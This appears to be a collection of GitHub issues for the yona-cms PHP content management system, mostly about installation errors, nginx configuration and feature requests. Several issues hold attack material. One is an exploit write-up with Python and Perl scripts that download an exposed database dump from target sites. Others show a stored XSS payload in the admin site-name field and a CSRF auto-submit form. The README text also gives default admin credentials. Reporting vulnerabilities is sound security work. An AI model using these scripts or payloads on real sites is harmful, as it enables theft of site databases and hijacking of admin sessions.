Created *.volt.php files in same directory where placed *.volt files.
Fixed in last commit.

Hi, do you have realization of tree hierarchy? For example, for shop.

remove dublication of code

on debian system，not found php7-intl extention。
i very like yona-cms，but i can't use in php7.

it would be good to provide password somewhere

http://demo.yonacms.com/
http://doc.yonacms.com/

I have a working version of Phalcon 2.0.10 on my CentOS 6 (64-bit) WebFaction server using PHP v. 5.6 (other Phalcon projects are working fine).

When I try to install yona-cms via
composer create-project oleksandr-torosh/yona-cms -s dev

It stops with

Problem 1

• The requested PHP extension ext-phalcon >=1.3.4 is missing from your system. Install or enable >PHP's phalcon extension.

My php.ini file contains:
extension_dir = /home/myProject/php56-exts
extension = phalcon.so

I tried copying the php.ini file into the yona-cms directory, editing the composer.json phalcon required line to:

"ext-phalcon": "*",

and

composer install from within the yona-cms directory, but I get the same error.

Any suggestions for what I would need to do to get this working?

oleksander my emails keep getting back as undelivered. can you contact me from another account?

Admin -> Manager users -> Edit a user -> Save user
Flash message is displayed with html
"User <b>yona</b> has been saved"

Seems like around phalcon 2.1, autoescaping was added to Flash messages to mitigate potential XSS attacks.

While "$flash->setAutoescape(false);" could be added in Bootstrap.php to allow HTML, etc, every instance of a Flash message that is built from variables would have to be escaped.
It is less error prone to continue autoescaping all Flash messages.

A custom Flash component could also be created to parse out some common escaped html and replace with non escaped html.

But for simplicity, instead of trying to highlight words using html, use another common notation, such as brackets
"User [yona] has been saved"

The yona demo site is having connection issues and is not loading correctly. Can you please rectify these issues?

Do you have a plan support PostgreSQL?
Thanks.

Достаточно через xss или другой механизм вызвать у авторизованного в панели управления: http://demo.yonacms.com/admin/index/logout - и сессия будет уничтожена, тексты потеряны, авторизация окончена.

Hi,

First, great work on yona. Very helpful. I am new to phalcon and yona. But keen to dig deeper. I have been building a small learning project using yona and so far so good. Works great. The only struggle I have is changing the admin log after session timeout to something else. I am trying to build a two layer user (frontend & backend) site. Can someone kindly hint me which part of the code I should be looking at please? I can't figure it out myself. Many thanks.

I mean codecept.phar, yona-cms.sql.gz. You can not versioning them.

Views rendered in wrong order. You could see the result here (if link will be unavailable, see screenshot below).
Phpinfo's information could be found here.
It looks really weird, because the same instance on a local server works as expected.

May be as menu widget ?

What is the license?

Is this for the upcoming 0.5 version or is the project shutting down?

I edit Page in Admin CMS and it show this error:

Fatal error: Call to a member function delete() on null in <my_path>/app/modules/Page/Model/Page.php on line 56

• It still update in database
• Its look like something wrong in function delete in Application\Cache\Manager

I access link "url/admin" but display content of Index controller. I think it direct to login page

Firstly, I use PostgresQL 9.6 and your file seem older. Can you backup a new version please , because each time i try to excute SQL query , it has error at line 755 (Copy new record to admin_user table)

Secondly, I have tried with MySQL also but i can not move or add new node. I just can rename node only.

Can you help me with this

Hi,

Your demo and documentations are not working ?!

Can you check ?
Thanks

Hi, i wonder, is there any plan to support phalcon 2.1 in near future?

I've made Little fix on Page.php

public function validation()
    {
     //add Validation init
      $validator = new Validation();

      $validator->add('slug', new UniquenessValidator(
          [
              "model"   => $this,
              "message" => $this->getDi()->get('helper')->translate("Page with slug is already exists")
          ]
      ));
      return $this->validate($validator);
    }

This is to make the docker install work:

1. Copying nginx conf from nowhere, should be: cp /var/www/yona-cms/docker/etc/nginx/conf.d/yona.conf /etc/nginx/conf.d/yona.conf after git clone and workdir is set to /var/www
2. root path is wrong in yona.conf, is /varwww/yona-cms/public; should be /var/www/yona-cms/public;
3. php5-mysql is missing apt-get install php5-mysql
4. php5-fpm need proper nginx user usermod -a -G www-data nginx
5. php5-gd is missing apt-get install php5-gd

Also, it seems semantic-ui is missing from default template (should it be?).

And i see this in the source, what is it used for?
https://api.github.com/repos/oleksandr-torosh/yona-cms?callback=callback

###########################################################################

Impact :

• The product stores sensitive information in files or directories that are accessible

to actors outside of the intended control sphere.

• An information exposure is the intentional or unintentional disclosure of information

to an actor that is not explicitly authorized to have access to that information.

• phpMyAdmin is a free software tool written in PHP, intended to handle the administration of

MySQL over the World Wide Web. It can be used to dump a database or a collection of

databases for backup or transfer to another SQL server (not necessarily a MySQL server).

The dump typically contains SQL statements to create the table, populate it, or both.

This file contains an phpMyAdmin SQL dump. This information is highly sensitive and

should not be found on a production system.

• It looks like this file contains a database backup/dump.

Acunetix inferred this filename from the domain name. A database backup contains a record of the

table structure and/or the data from a database and is usually in the form of a list of SQL statements.

A database backup is most often used for backing up a database so that its contents can be restored

in the event of data loss. This information is highly sensitive and should never be found on a production system.

Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible

to the web server. As a workaround, you could restrict access to this file.

###########################################################################

Installation

Composer
Run

composer create-project oleksandr-torosh/yona-cms -s dev
Or create composer.json file and install dependencies:

{
"require": {
"oleksandr-torosh/yona-cms": "dev-master"
}
}
composer install
After some time, do not forget run composer update for update dependencies:

composer update
Composer is required. It will install required libraries.
If you have error with autoload.php file, the reason - missed composer update installation step.

How to install Composer =>

getcomposer.org/doc/00-intro.md#installation-linux-unix-osx

Admin dashboard
Open http://yona-cms/admin and auth:

login: yona
password: yonacmsphalcon
Change admin user password and delete yona user.

Database
Edit /app/config/environment/development.php and setup
database connection. Import MySQL dump file yona-cms.sql

Requirements
php 5.6+
phalcon 3.0.0+
mysql
php-intl
apache (+mod_rewrite) or nginx

###########################################################################

File :

/yona-cms.sql

-- phpMyAdmin SQL Dump
-- version 3.4.11.1deb2+deb7u1
-- phpmyadmin.net

-- Host: localhost
-- Server version: 5.6.23
-- PHP Version: 5.6.10-1~dotdeb+7.3
-- Database: yona-cms

github.com/alexander-torosh/yona-cms/raw/master/yona-cms.sql

File :

/yona_cms_postgres.sql

-- PostgreSQL database dump
-- Dumped from database version 9.4.8
-- Dumped by pg_dump version 9.4.8

raw.githubusercontent.com/alexander-torosh/yona-cms/master/yona_cms_postgres.sql

###########################################################################

Database Disclosure Information Exposure Exploit 1 :

#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/yona-cms.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.=", html))
print rdo
exit

###########################################################################

Database Disclosure Information Exposure Exploit 2 :

#!/usr/bin/perl -w

Author : KingSkrupellos

Team : Cyberizm Digital Security Army

use LWP::Simple;
use LWP::UserAgent;

system('cls');
system('YonaCMS Software Database Disclosure Exploit');
system('color a');

if(@argv < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @argv;

$File="yona-cms.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/yona-cms.sql");

if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/yona-cms.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}

If install yonacms on xampp, htaccess seem not work right.

Site can't be loaded with css and run localhost/yonacms/admin get error

Please change
{% if phrases is not empty %}
to
{% if !(phrases is empty) %}
in app/modules/Cms/views/translate/index.volt

Hi, i'm sure you noticed that you're demo page is hacked, do you realize what's wrong? is this yona fault or phalcon? or maybe server itself.

is this production ready or not?

"document.csrf.submit()"
form name="csrf"
action="http://127.0.0.1/user.php?cont=update_user" method="post">

After installation going to http://yona-cms.local/admin results in a 404 error. Going to http://yona-cms.local/public/ returns a page without any assets loaded, these assets can't be found either.

If you have download link to file - download not work.
self.click = function (e) {

* if (this.target) {
return true;
}*
if (!self.History.enabled) {
console.log('history disabled');
return true;
}

https://github.com/oleksandr-torosh/yona-cms/blob/master/public/static/js/ajax.js

Hello,
I tried to implement Mail ext ( https://github.com/phalcon-ext/mailer ).
Is working to send emails without template, but when I try to send with template, I get empty content.

http://demo.yonacms.com/none-page

404

Страница не найдена

IndexController handler class cannot be loaded

/var/www/clients/client8/web243/private/app/Bootstrap.php::263

#0 [internal function]: Phalcon\Mvc\Dispatcher->_throwDispatchException('IndexController...', 2)
#1 /var/www/clients/client8/web243/private/app/Bootstrap.php(263): Phalcon\Dispatcher->dispatch()
#2 /var/www/clients/client8/web243/private/app/Bootstrap.php(230): Bootstrap->dispatch(Object(Phalcon\DI\FactoryDefault))
#3 /var/www/clients/client8/web243/web/index.php(28): Bootstrap->run()
#4 {main}

{%- macro leaf_item(leaf, url) %}
    <li id="category_{{ leaf.getId() }}">
        <div class="item">
            <span class="title">{{ leaf.getTitle() }}</span>
            <span class="info">({{ leaf.getSlug() }})</span>
            <a href="{{ url }}category/admin/edit/{{ leaf.getId() }}"><i class="icon edit"></i></a>
            <a href="javascript:void(0);" onclick="deleteCategory({{ leaf.getId() }}, this)" class="delete"><i class="icon trash"></i></a>
        </div>
        {% if leaf.hasChildren() %}
            <ol>
                {% for child in leaf.children() %}
                    {{ leaf_item(child, url) }}
                {% endfor %}
            </ol>
        {% endif %}
    </li>
{%- endmacro %}

<div class="ui blue segment">
    You can drag and drop tree elements to change order and relations
</div>

{% for root, root_title in roots %}
    <div class="ui blue segment">
        <h3>{{ root_title }}</h3>

        <ol class="sortable" id="root_{{ root }}">

            {% set tree = category_helper.treeUpperLeafs(root) %}
            {% for leaf in tree %}
                {{ leaf_item(leaf, url.get()) }}
            {% endfor %}

        </ol>

        <a class="save ui button primary" id="save-root-{{ root }}" data-root="{{ root }}">
            <i class="save icon"></i> Save
        </a>
        <a href="javascript:void(0);" data-root="{{ root }}" class="add ui button positive">
            <i class="icon plus"></i> Add
        </a>
    </div>
{% endfor %}

{{ stylesheet_link("vendor/jquery-ui-1.11.4/jquery-ui.min.css") }}
{{ javascript_include("vendor/jquery-ui-1.11.4/jquery-ui.min.js") }}
{{ javascript_include("vendor/js/jquery.mjs.nestedSortable.js") }}

the file is /modules/Tree/views/admin/index.volt

fresh install. and it's working on last week, I haven't update anycode.

pls refer to my screenshot

i use this conf, in my nginx server, in day 1 dan 2 fine, day 3 get this error with this conf :

server {
listen 80;
server_name www.web.com;
rewrite ^(.*) http://web.com$1 permanent;
}

server {
listen 80;
server_name web.com;

# root directive should be global
root   /usr/share/nginx/html/web/public/;

index  index.php;

    charset         utf-8;

    rewrite_log     on;
    client_max_body_size 5M;

    # Very Important
    underscores_in_headers on;

access_log /usr/share/nginx/html/log/access.log;
error_log /usr/share/nginx/html/log/error.log;

location / {
    index   index.php;

            if (-f $request_filename) {
                    break;
            }

            if (!-e $request_filename) {
                    rewrite ^(.+)$ /index.php?_url=$1 last;
                    break;
            }
}

error_page  404              /index.php;

# redirect server error pages to the static page /50x.html
#
error_page   500 502 503 504  /index.php;
location = index.php {
    root   /usr/share/nginx/html;
}

 location ~ \.php$ {
            fastcgi_pass 127.0.0.1:9000;
            #fastcgi_pass   unix:/tmp/php-fpm.sock;

            fastcgi_index   index.php;

            include /etc/nginx/fastcgi_params;
            include /etc/nginx/pagespeed_filters.conf;

            fastcgi_split_path_info         ^(.+\.php)(/.+)$;
            fastcgi_param PATH_INFO         $request_uri;
            fastcgi_param SCRIPT_TRANSLATED $document_root$fastcgi_path_info;
            fastcgi_param SCRIPT_FILENAME   $document_root$fastcgi_script_name;

            fastcgi_param APPLICATION_ENV "development";

            fastcgi_buffers         256 16k;
}

}

and when i see in my error log i found this :

PHP message: PHP Fatal error: require_once(): Failed opening required '/usr/share/nginx/html/web/public/../app/../vendor/autoload.php' (include_path='.:/usr/share/pear:/usr/share/php') in /usr/share/nginx/html/web/app/Bootstrap.php on line 32" while reading response header from upstream, client: 68.180.228.173, server: qawwam.com, request: "GET /category/17/ngetwit HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "qawwam.com"

Manage Publication page showing "Internal Server Error 500" after installation

Hello, i am getting this error during installation via composer.

Fatal error: Cannot use 'String' as class name as it is reserved in phar://C:/Pr ogramData/ComposerSetup/bin/composer.phar/vendor/justinrainbow/json-schema/src/J sonSchema/Constraints/String.php on line 18

Phalcon: 3.0.1
PHP 7.0.9

I am not sure which one need to update

For the Meta-Description , Title and Keyword the fields are missing and cannot be updated. I have tried cloning the master source on 3 computers and still the meta tags cannot be updated. They always output as null.

Each page will might have difference layouts. Each layout should be combined of page contents, widgets, sliders.

Без авторизации в панели управления можно получить доступ к этой странице и заменить мета-теги

Еще:
http://demo.yonacms.com/seo/manager
http://demo.yonacms.com/cms/language

Пишем в SITE NAME (остальные не проверял) и вуаля:

Yona <b>CMS</b></title><script>alert('Ай-ай-аааай!')</script><title>Еще один title!

Integrate phalcon-mailer
https://github.com/vanchelo/phalcon-mailer